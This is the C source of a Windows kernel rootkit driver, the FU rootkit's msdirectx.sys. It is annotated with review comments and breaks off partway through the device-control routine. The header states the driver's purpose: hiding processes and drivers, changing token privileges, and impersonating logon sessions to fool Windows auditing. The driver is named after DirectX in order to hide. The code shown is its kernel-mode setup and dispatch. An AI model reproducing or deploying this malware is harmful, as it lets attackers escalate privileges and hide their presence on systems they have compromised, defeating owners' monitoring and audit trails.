///////////////////////////////////////////////////////////////////////////////////////
// Filename Rootkit.c
//
// Author: fuzen_op
// Email: fuzen_op@yahoo.com or fuzen_op@rootkit.com
//
// Description: This driver does all the work of fu.exe. The driver is never unloaded
// until reboot. You can use whatever methods you like to load the driver
// such as SystemLoadAndCallImage suggested by Greg Hoglund. The driver
// is named msdirectx.sys. It is a play on Microsoft's DirectX and is named
// this to help hide it. (A future tool will hide it completely!) The
// driver can change the groups and privileges on any process. It can also
// hide a process. Another feature is it can impersonate another logon
// session so that Windows Auditing etc. does not know what user really
// performed the actions you choose to take with the process. It does all
// this by Direct Kernel Object Manipulation (TM). No worries about do I have
// permission to that process, token, etc. If you can load a driver once,
// you are golden! NOW IT HIDES DRIVERS TOO!
//
// Date: 5/27/2003
// Version: 2.0
//
// Date 7/04/2003 Fixed a problem with a modified token not being inheritable.
// 12/04/2003 Fixed problem with faking out the Windows Event Viewer.
// Cleaned up the code a lot!
// 12/05/2003 Now the driver walks the PsLoadedModuleList and removes references
// to the device being hidden. Even after the device is hidden, a user
// land process can open a handle to it if its symbolic link name still
// exists. Obviously, a stealth driver would not want to create a symbolic
// link at all, or it could delete the symbolic link once it has initialized,
// through the use of an IOCTL.
#include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"
#include "Rootkit.h"
#include "ProcessName.h"
#include "ioctlcmd.h"
// Win32 symbolic link (opened from user mode as \\.\msdirectx) and the NT
// device name it resolves to. Both are named after DirectX on purpose (see
// the file header); the link is what lets a user-mode client reach the
// IOCTL interface at all.
const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\msdirectx";
const WCHAR deviceNameBuffer[] = L"\\Device\\msdirectx";
// Debug-output switch.  The intended #ifdef guard is commented out (and the
// original define line was misspelled "DEGUBPRINT", fixed below), so
// DebugPrint is unconditionally DbgPrint: every DebugPrint() in this file
// reaches the kernel debugger output stream regardless of build type, which
// is an observable artifact of the driver (e.g. in a debug-print viewer).
//#define DEBUGPRINT
//#ifdef DEBUGPRINT
#define DebugPrint DbgPrint
//#else
// #define DebugPrint
//#endif
/*
 * DriverEntry -- driver initialization.
 *
 * Creates the \Device\msdirectx device object and its \DosDevices\msdirectx
 * symbolic link, points IRP_MJ_CREATE / IRP_MJ_CLOSE / IRP_MJ_SHUTDOWN /
 * IRP_MJ_DEVICE_CONTROL at RootkitDispatch, registers RootkitUnload, and then
 * resolves the two kernel locations stored in globals for later use:
 *   gul_ProcessNameOffset  - offset of the image name inside EPROCESS, found
 *                            by GetLocationOfProcessName() starting from the
 *                            current process (presumably used by the process
 *                            lookup/hiding code in RootkitDeviceControl).
 *   gul_PsLoadedModuleList - head of the loaded-module list, found by
 *                            FindPsLoadedModuleList() (used by the driver
 *                            hiding code per the 12/05/2003 header note).
 *
 * DriverObject - driver object supplied by the I/O manager.
 * RegistryPath - service registry key; not used.
 *
 * Returns STATUS_SUCCESS; the NTSTATUS from IoCreateDevice or
 * IoCreateSymbolicLink if either fails; or STATUS_UNSUCCESSFUL if either
 * kernel location cannot be resolved.  Every failure path tears down the
 * device object and symbolic link that were created before it.
 *
 * NOTE(review): the device is created with characteristics 0 and no security
 * descriptor, and a \DosDevices link is published for it, so nothing in this
 * file limits which user-mode caller may open \\.\msdirectx and submit the
 * IOCTLs handled by RootkitDeviceControl.
 * NOTE(review): DebugPrint is unconditionally DbgPrint (see macro above), so
 * the failure strings below go to the kernel debugger output.
 */
NTSTATUS DriverEntry(
    IN PDRIVER_OBJECT DriverObject,
    IN PUNICODE_STRING RegistryPath
    )
{
    NTSTATUS status;
    UNICODE_STRING devName;
    UNICODE_STRING linkName;

    RtlInitUnicodeString(&devName, deviceNameBuffer);
    RtlInitUnicodeString(&linkName, deviceLinkBuffer);

    /* Device object: no extension, exclusive, default characteristics. */
    status = IoCreateDevice(DriverObject,
                            0,
                            &devName,
                            FILE_DEVICE_ROOTKIT,
                            0,
                            TRUE,
                            &g_RootkitDevice);
    if (!NT_SUCCESS(status)) {
        DebugPrint("Failed to create device!\n");
        return status;
    }

    /* User-mode reachable name; without it only \Device\msdirectx exists. */
    status = IoCreateSymbolicLink(&linkName, &devName);
    if (!NT_SUCCESS(status)) {
        DebugPrint("Failed to create symbolic link!\n");
        goto fail_device;
    }

    /* One routine handles every major function this driver accepts. */
    DriverObject->MajorFunction[IRP_MJ_SHUTDOWN]       = RootkitDispatch;
    DriverObject->MajorFunction[IRP_MJ_CREATE]         = RootkitDispatch;
    DriverObject->MajorFunction[IRP_MJ_CLOSE]          = RootkitDispatch;
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = RootkitDispatch;

    /* Registered, but the header states the driver is not meant to be
     * unloaded before reboot; RootkitUnload only removes the device. */
    DriverObject->DriverUnload = RootkitUnload;

    gul_ProcessNameOffset = GetLocationOfProcessName(PsGetCurrentProcess());
    if (!gul_ProcessNameOffset) {
        status = STATUS_UNSUCCESSFUL;
        goto fail_link;
    }

    gul_PsLoadedModuleList = (PMODULE_ENTRY) FindPsLoadedModuleList(DriverObject);
    if (!gul_PsLoadedModuleList) {
        status = STATUS_UNSUCCESSFUL;
        goto fail_link;
    }

    return STATUS_SUCCESS;

fail_link:
    IoDeleteSymbolicLink(&linkName);
fail_device:
    IoDeleteDevice(DriverObject->DeviceObject);
    return status;
}
/*
 * RootkitUnload -- DriverUnload callback.
 *
 * If a device object exists, deletes the \DosDevices\msdirectx symbolic link
 * and then the device object.  Nothing else is undone: any kernel structures
 * the IOCTL handlers modified (the header describes process hiding, token
 * changes and PsLoadedModuleList edits) are left as they are, which is why
 * the header says the driver stays loaded until reboot and DriverEntry warns
 * against unloading.
 *
 * DriverObject - the driver being unloaded.
 *
 * Returns STATUS_SUCCESS in every case.
 *
 * NOTE(review): DRIVER_UNLOAD is a VOID callback in the WDK; the NTSTATUS
 * returned here is ignored by the I/O manager.  Left unchanged to match the
 * prototype presumably declared in Rootkit.h -- confirm there.
 */
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING linkName;

    /* Nothing to tear down if no device object was ever attached. */
    if (DriverObject->DeviceObject == NULL)
        return STATUS_SUCCESS;

    RtlInitUnicodeString(&linkName, deviceLinkBuffer);
    IoDeleteSymbolicLink(&linkName);
    IoDeleteDevice(DriverObject->DeviceObject);

    return STATUS_SUCCESS;
}
/*
 * RootkitDispatch -- the single dispatch routine for IRP_MJ_CREATE,
 * IRP_MJ_CLOSE, IRP_MJ_SHUTDOWN and IRP_MJ_DEVICE_CONTROL (DriverEntry points
 * all four here).
 *
 * Create, close and shutdown are completed immediately with STATUS_SUCCESS
 * and Information = 0.  Device-control requests are forwarded to
 * RootkitDeviceControl together with the IOCTL code, the input/output
 * buffers and lengths from the current stack location, and a pointer to
 * Irp->IoStatus so the handler can report the bytes returned.
 *
 * DeviceObject - the \Device\msdirectx device object.
 * Irp          - the request; always completed here with IO_NO_INCREMENT.
 *
 * Returns STATUS_SUCCESS for create/close/shutdown, otherwise the value
 * RootkitDeviceControl returned.
 *
 * NOTE(review): for METHOD_NEITHER IOCTLs the output pointer is taken
 * straight from Irp->UserBuffer -- a user-supplied address -- and no
 * ProbeForWrite / __try protection appears in this routine; the input side
 * is still read from AssociatedIrp.SystemBuffer rather than
 * Parameters.DeviceIoControl.Type3InputBuffer.  Whether any code in
 * ioctlcmd.h actually uses METHOD_NEITHER is not visible here.  The buffer
 * lengths are passed through unchecked, so all length validation has to live
 * in RootkitDeviceControl.
 */
NTSTATUS
RootkitDispatch(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp
    )
{
    PIO_STACK_LOCATION stack;
    NTSTATUS status;
    ULONG ioctl;
    ULONG inLen;
    ULONG outLen;
    PVOID inBuf;
    PVOID outBuf;

    /* Default outcome for every request: success, nothing transferred. */
    status = STATUS_SUCCESS;
    Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;

    stack = IoGetCurrentIrpStackLocation(Irp);

    if (stack->MajorFunction == IRP_MJ_DEVICE_CONTROL) {
        ioctl  = stack->Parameters.DeviceIoControl.IoControlCode;
        inLen  = stack->Parameters.DeviceIoControl.InputBufferLength;
        outLen = stack->Parameters.DeviceIoControl.OutputBufferLength;

        /* Input always comes from the I/O manager's system buffer; output
         * does too unless the IOCTL is METHOD_NEITHER, in which case the
         * raw user pointer in Irp->UserBuffer is handed down unchecked. */
        inBuf = Irp->AssociatedIrp.SystemBuffer;
        if (IOCTL_TRANSFER_TYPE(ioctl) == METHOD_NEITHER)
            outBuf = Irp->UserBuffer;
        else
            outBuf = Irp->AssociatedIrp.SystemBuffer;

        status = RootkitDeviceControl(stack->FileObject, TRUE,
                                      inBuf, inLen,
                                      outBuf, outLen,
                                      ioctl, &Irp->IoStatus, DeviceObject);
    }
    /* IRP_MJ_CREATE / IRP_MJ_CLOSE / IRP_MJ_SHUTDOWN: nothing to do. */

    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return status;
}
NTSTATUS
RootkitDeviceControl(
IN PFILE_OBJECT FileObject,
IN BOOLEAN Wait,
IN PVOID InputBuffer,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer,
IN ULONG OutputBufferLength,
IN ULONG IoControlCode,
OUT PIO_STATUS_BLOCK IoStatus,
IN PDEVICE_OBJECT DeviceObject
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceLinkUnicodeString;
MODULE_ENTRY m_current;
PMODULE_ENTRY pm_current;
ANSI_STRING ansi_DriverName;
ANSI_STRING hide_DriverName;
UNICODE_STRING uni_hide_DriverName;
int i_count = 0, i_numLogs = 0, find_PID = 0;
int nluids = 0, i_PrivCount = 0, i_VariableLen = 0;
int i_LuidsUsed = 0, luid_attr_count = 0, i_SidCount = 0;
in